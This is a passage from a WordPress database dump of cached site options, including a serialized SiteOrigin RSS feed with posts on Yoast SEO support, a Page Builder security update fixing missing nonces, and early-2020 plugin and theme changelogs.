;i:20;s:5:\"nl_BE\";i:21;s:3:\"ast\";i:22;s:5:\"lb_LU\";i:23;s:5:\"es_ES\";i:24;s:5:\"pt_PT\";i:25;s:3:\"mlt\";}s:8:\"operator\";s:2:\"in\";}}}}}','no'),(62180,'_site_transient_timeout_theme_roots','1604083643','no'),(62181,'_site_transient_theme_roots','a:8:{s:13:\"twentyfifteen\";s:7:\"/themes\";s:14:\"twentyfourteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";s:10:\"university\";s:7:\"/themes\";s:13:\"vantage-child\";s:7:\"/themes\";s:7:\"vantage\";s:7:\"/themes\";s:10:\"zerif-lite\";s:7:\"/themes\";}','no'),(62182,'_site_transient_timeout_browser_734e826b21d04167622079ae739769f4','1604686643','no'),(62183,'_site_transient_browser_734e826b21d04167622079ae739769f4','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"86.0.4240.111\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(62184,'_site_transient_timeout_php_check_9c1053d8f82668af273e4a26e955e566','1604686644','no'),(62185,'_site_transient_php_check_9c1053d8f82668af273e4a26e955e566','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(62192,'_transient_timeout_wpseo_unindexed_post_link_count','1604168244','no'),(62193,'_transient_wpseo_unindexed_post_link_count','1','no'),(62194,'_transient_timeout_wpseo_unindexed_term_link_count','1604168244','no'),(62195,'_transient_wpseo_unindexed_term_link_count','1','no'),(62196,'_transient_timeout_feed_2dd0202377a060f0df35cceaacc2c13c','1604125044','no'),(62197,'_transient_feed_2dd0202377a060f0df35cceaacc2c13c','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"SiteOrigin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://siteorigin.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Free WordPress Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Jul 2020 20:33:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wordpress.org/?v=5.5.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Improved Yoast SEO Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://siteorigin.com/improved-yoast-seo-support/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://siteorigin.com/improved-yoast-seo-support/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Jul 2020 19:53:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:13:\"Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=256602\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:606:\"<p>We\'re excited to announce that Page Builder version <code>2.11.0</code> greatly improves Yoast SEO compatibility in the Classic and Block Editor. In the Classic Editor, we\'ve extended content analysis to all widgets, previously only a predefined list of core WordPress and SiteOrigin widgets were analyzed. In the Block Editor, we\'ve introduced content analysis to the SiteOrigin Layout Block.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/improved-yoast-seo-support/\">Improved Yoast SEO Support</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3767:\"<p>We&#8217;re excited to announce that Page Builder version <code>2.11.0</code> greatly improves Yoast SEO compatibility in the Classic and Block Editor. In the Classic Editor, we&#8217;ve extended content analysis to all widgets, previously only a predefined list of core WordPress and SiteOrigin widgets were analyzed. In the Block Editor, we&#8217;ve introduced content analysis to the SiteOrigin Layout Block. The SiteOrigin Widget Block was already supplying data for content analysis and therefore didn&#8217;t require any additional work.</p>\n<h3>Classic Editor</h3>\n<div id=\"attachment_256848\" style=\"width: 865px\" class=\"wp-caption alignnone\"><a href=\"https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"><img aria-describedby=\"caption-attachment-256848\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo.jpg\" alt=\"\" width=\"855\" height=\"2308\" class=\"size-full wp-image-256848\" srcset=\"https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo.jpg 855w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-111x300.jpg 111w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-259x699.jpg 259w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-768x2073.jpg 768w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-569x1536.jpg 569w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-759x2048.jpg 759w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-389x1050.jpg 389w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-classic-editor-yoast-seo-313x845.jpg 313w\" sizes=\"(max-width: 855px) 100vw, 855px\" /></a></p>\n<p id=\"caption-attachment-256848\" class=\"wp-caption-text\">Yoast content analysis of the Corp demo home page in the Classic Editor.</p>\n</div>\n<h3>Block Editor</h3>\n<div id=\"attachment_256827\" style=\"width: 865px\" class=\"wp-caption alignnone\"><a href=\"https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor.jpg\" target=\"_blank\" rel=\"noopener noreferrer\"><img aria-describedby=\"caption-attachment-256827\" loading=\"lazy\" src=\"https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor.jpg\" alt=\"\" width=\"855\" height=\"2469\" class=\"size-full wp-image-256827\" srcset=\"https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor.jpg 855w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-104x300.jpg 104w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-242x699.jpg 242w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-768x2218.jpg 768w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-532x1536.jpg 532w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-709x2048.jpg 709w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-364x1050.jpg 364w, https://siteorigin.com/wp-content/uploads/2020/07/corp-home-yoast-block-editor-313x904.jpg 313w\" sizes=\"(max-width: 855px) 100vw, 855px\" /></a></p>\n<p id=\"caption-attachment-256827\" class=\"wp-caption-text\">Yoast content analysis of the Corp demo home page in the Block Editor.</p>\n</div>\n<p>Thanks for reading. If you have any comments or questions, please, let us know below.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/improved-yoast-seo-support/\">Improved Yoast SEO Support</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://siteorigin.com/improved-yoast-seo-support/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"6\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:73:\"\n		\n		\n					\n		\n		\n		\n				\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Page Builder 2.10.16 Security Update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://siteorigin.com/page-builder-2-10-16-security-update/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://siteorigin.com/page-builder-2-10-16-security-update/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 May 2020 14:37:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"WordPress Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=241980\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:695:\"<p>On Monday the 4th of May, <a href=\"https://www.wordfence.com/\" rel=\"noopener noreferrer\" target=\"_blank\">Wordfence</a> kindly reached out and let us know they had discovered two security vulnerabilities in Page Builder. SiteOrigin is primarily based in the GMT+2 timezone, the news reached us after working hours. On Tuesday the 5th of May, we resolved both issues. Once testing was complete, we released an update for Page Builder, version <code>2.10.16</code>.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/page-builder-2-10-16-security-update/\">Page Builder 2.10.16 Security Update</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2233:\"<p>Page Builder <code>2.10.16</code> is a security update that resolves two recently discovered vulnerabilities. Updating Page Builder resolves both issues with no further action required.</p>\n<p>On Monday the 4th of May, <a href=\"https://www.wordfence.com/\" rel=\"noopener noreferrer\" target=\"_blank\">Wordfence</a> kindly reached out and let us know they had discovered two security vulnerabilities in Page Builder. SiteOrigin is primarily based in the GMT+2 timezone, the news reached us after working hours. On Tuesday the 5th of May, we resolved both issues. Once testing was complete, we released an update for Page Builder.</p>\n<p>&#8220;<a href=\"https://developer.wordpress.org/themes/theme-security/using-nonces/\" rel=\"noopener noreferrer\" target=\"_blank\">WordPress nonces</a> are one-time use security tokens generated by WordPress to help protect URLs and forms from misuse.&#8221; The Page Builder Live Editor and <code>so_panels_builder_content</code> Ajax action were each missing a nonce. An attacker could trick a user with an Administrator role into visiting a malformed URL and executing malicious JavaScript in the browser. To resolve, a nonce was added to the Live Editor preview URL and another to the <code>so_panels_builder_content</code> Ajax action. We&#8217;re grateful for Wordfence&#8217;s help and for letting us know as soon as they were aware. For a full walkthrough of the issues found, please, see the Wordfence report <a href=\"https://www.wordfence.com/blog/2020/05/vulnerabilities-patched-in-page-builder-by-siteorigin-affects-over-1-million-sites/\" rel=\"noopener noreferrer\" target=\"_blank\">Vulnerabilities Patched in Page Builder by SiteOrigin</a>.</p>\n<p>If you have any questions or concerns, please, feel free to comment below. For any support queries, please, open a thread on our <a href=\"https://siteorigin.com/thread/\">forum</a>. Email support via <a href=\"mailto:support@siteorigin.com\">support@siteorigin.com</a> is available for our SiteOrigin Premium users.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/page-builder-2-10-16-security-update/\">Page Builder 2.10.16 Security Update</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://siteorigin.com/page-builder-2-10-16-security-update/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:73:\"\n		\n		\n					\n		\n		\n		\n				\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"January – February 2020 Plugin and Theme Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://siteorigin.com/january-february-2020-plugin-and-theme-updates/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"https://siteorigin.com/january-february-2020-plugin-and-theme-updates/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 27 Feb 2020 17:34:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://siteorigin.com/?p=228262\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:547:\"<p>January and February saw the release of several updates of varying sizes with the Widgets Bundle update being the largest. In this post, I\'ll briefly cover what was included in those updates. Thanks to all of our users, especially those that assisted with feedback and feature requests.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/january-february-2020-plugin-and-theme-updates/\">January &#8211; February 2020 Plugin and Theme Updates</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Andrew Misplon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:6948:\"<p>January and February saw the release of several updates of varying sizes with the Widgets Bundle update being the largest. In this post, I&#8217;ll briefly cover what was included in those updates. Thanks to all of our users, especially those that assisted with feedback and feature requests.</p>\n<h3>Widgets Bundle &#8211; 1.16.0 &#8211; 11 February 2020</h3>\n<p>The biggest of our recent updates, this release includes a mix of new features and fixes, many based on user feedback and requests.</p>\n<ul>\n<li>Block Editor: Fixed widget select field width and alignment.</li>\n<li>Removed unused template files.</li>\n<li>Contact Form: Improved checking for SiteOrigin development email addresses.</li>\n<li>Minor styling improvements to the Classic and Block Editor admin interfaces.</li>\n<li>Features: Added a new setting to select the H tag to be used for the title field.</li>\n<li>Hero: If a height value is assigned, added prefilling to avoid a page jump.</li>\n<li>Hero: Added `font-display: swap` for Google font imports.</li>\n<li>Layout Slider: If a height value is assigned, added prefilling to avoid a page jump.</li>\n<li>Image Grid: Added a class of `sow-image-grid-image_html` to each image. Can be used to exclude images from Lazy Loading plugins.</li>\n<li>Simple Masonry: Added a class of `sow-masonry-grid-image` to each image. Can be used to exclude images from Lazy Loading plugins.</li>\n<li>Features: Added fallback support for the Icon image field.</li>\n<li>Testimonials: Add fallback support for the Image field.</li>\n<li>Post Carousel: Prevented looping until all posts are loaded.</li>\n<li>Post Carousel: Added a new setting to disable looping.</li>\n<li>Post Carousel: Prevented scrolling past loading items and loop as soon as last item is completely visible.</li>\n<li>Contact Form: Added disabled cursor to submit button when disabled.</li>\n<li>Block Editor: Resolved Features widget default settings.</li>\n<li>Tabs and Accordion: Account for accented characters.</li>\n<li>Social Media Buttons: Allowed for multiple instances of the same network without duplicating colors.</li>\n<li>Social Media Buttons: Ensured all icons are correctly centered.</li>\n<li>Contact Form: Added lightweight validation for phone numbers.</li>\n<li>Block Editor: Display author for third party widgets.</li>\n<li>Block Editor: Added processing for the more quicktag in the Editor widget.</li>\n<li>Tabs and Accordion: Added icon spacing.</li>\n<li>Testimonials: Improved image sizing behavior for square images.</li>\n</ul>\n<p><a href=\"https://github.com/siteorigin/so-widgets-bundle/releases/tag/1.16.0\" rel=\"noopener noreferrer\" target=\"_blank\">View the release on GitHub</a>.</p>\n<h3>Page Builder &#8211; 2.10.14 &#8211; 04 February 2020</h3>\n<p>Although the changelog is brief, <a href=\"https://github.com/siteorigin/siteorigin-panels/compare/2.10.13...2.10.14\" rel=\"noopener noreferrer\" target=\"_blank\">20 commits</a> went into this release, mostly focussed on small styling fixes and improvements.</p>\n<ul>\n<li>Several Classic and Block Editor admin styling fixes.</li>\n</ul>\n<p><a href=\"https://github.com/siteorigin/siteorigin-panels/releases/tag/2.10.14\" rel=\"noopener noreferrer\" target=\"_blank\">View the release on GitHub</a>.</p>\n<h3>SiteOrigin CSS &#8211; 1.2.5 &#8211; 04 February 2020</h3>\n<p>A minor update to resolve an edge case warning and some minor styling issues.</p>\n<ul>\n<li>Removed `themeCSS` localized script to prevent `preg_replace()` warning.</li>\n<li>Minor form styling fixes.</li>\n</ul>\n<p><a href=\"https://github.com/siteorigin/so-css/releases/tag/1.2.5\" rel=\"noopener noreferrer\" target=\"_blank\">View the release on GitHub</a>.</p>\n<h3>SiteOrigin Premium &#8211; 1.12.0 &#8211; 30 January 2020</h3>\n<p>A few new settings and minor fixes.</p>\n<ul>\n<li>Lightbox: Updated Lightbox2 to v2.11.1.</li>\n<li>Lightbox: Added a Disable Scrolling setting.</li>\n<li>Social Media Buttons: Properly center custom icon images.</li>\n<li>Accordion: Added a custom image icon setting.</li>\n<li>Tabs: Added a custom image icon setting.</li>\n<li>Image Overlay: Added a Desktop Device Trigger setting. Show on hover or always show.</li>\n<li>WooCommerce Templates: Fixed action button sizing.</li>\n</ul>\n<h3>SiteOrigin Unwind &#8211; 1.6.0 &#8211; 10 February 2020</h3>\n<ul>\n<li>Resolved mini-cart remove icon overlap.</li>\n<li>Updated WooCommerce Customizer settings CSS.</li>\n<li>Resolved mini-cart and cart widget image not updating to match the variation selected.</li>\n<li>Minor Stripe checkout styling fixes.</li>\n<li>Minor WooCommerce styling improvements.</li>\n<li>Added an a new Add to Cart button setting at `Customize > Theme Settings > WooCommerce > Add to Cart`.</li>\n<li>Resolved gap below gallery when variable product added to the cart.</li>\n</ul>\n<p><a href=\"https://github.com/siteorigin/siteorigin-unwind/releases/tag/1.6.0\" rel=\"noopener noreferrer\" target=\"_blank\">View the release on GitHub</a>.</p>\n<h3>SiteOrigin Corp &#8211; 1.16.0 &#8211; 27 January 2020</h3>\n<p>Notable in this release is a new setting added to change the main menu hover style from underline to a regular link color change. This feature wasn&#8217;t requested but after viewing many user sites using Corp we noticed some header designs that would look better with a conventional menu link color change on hover and no underline.</p>\n<ul>\n<li>One page layout: Minor design adjustments.</li>\n<li>WooCommerce hover buttons: prevented overflow.</li>\n<li>Established a 15px typography base.</li>\n<li>Minor WooCommerce widget style adjustments.</li>\n<li>Changed menu font sizing to rem.</li>\n<li>Added a new menu hover underline setting located at `Customize > Theme Settings > Navigation > Menu Link Hover Underline`.</li>\n<li>Minor improvements to the one page menu current page and section indication.</li>\n</ul>\n<p><a href=\"https://github.com/siteorigin/siteorigin-corp/releases/tag/1.16.0\" rel=\"noopener noreferrer\" target=\"_blank\">View the release on GitHub</a>.</p>\n<h3>Vantage &#8211; 1.14.4 &#8211; 02 January 2020</h3>\n<ul>\n<li>Page Slider: Prevented shortcode from outputting if slider plugin not activated.</li>\n<li>Logo in Menu: Fixed the menu alignment preview in the Customizer.</li>\n<li>Logo in Menu: Fixed the logo image and site title alignment if both are in use.</li>\n</ul>\n<p><a href=\"https://github.com/siteorigin/vantage/releases/edit/1.14.4\" rel=\"noopener noreferrer\" target=\"_blank\">View the release on GitHub</a>.</p>\n<p>Thanks again to everyone that sent feedback and requests. If there is a feature or fix you&#8217;d like to see take priority, please, let us know. The more feedback we receive for a particular feature or fix, the higher it moves up our to-do list.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://siteorigin.com/january-february-2020-plugin-and-theme-updates/\">January &#8211; February 2020 Plugin and Theme Updates</a> appeared first on <a rel=\"nofollow\" href=\"https://siteorigin.com\">SiteOrigin</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://siteorigin.com/january-february-2020-plugin-and-theme-updates/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"8\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:76:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"A Custom CSS Guide to Page Builder Row, Cell &amp; Widget 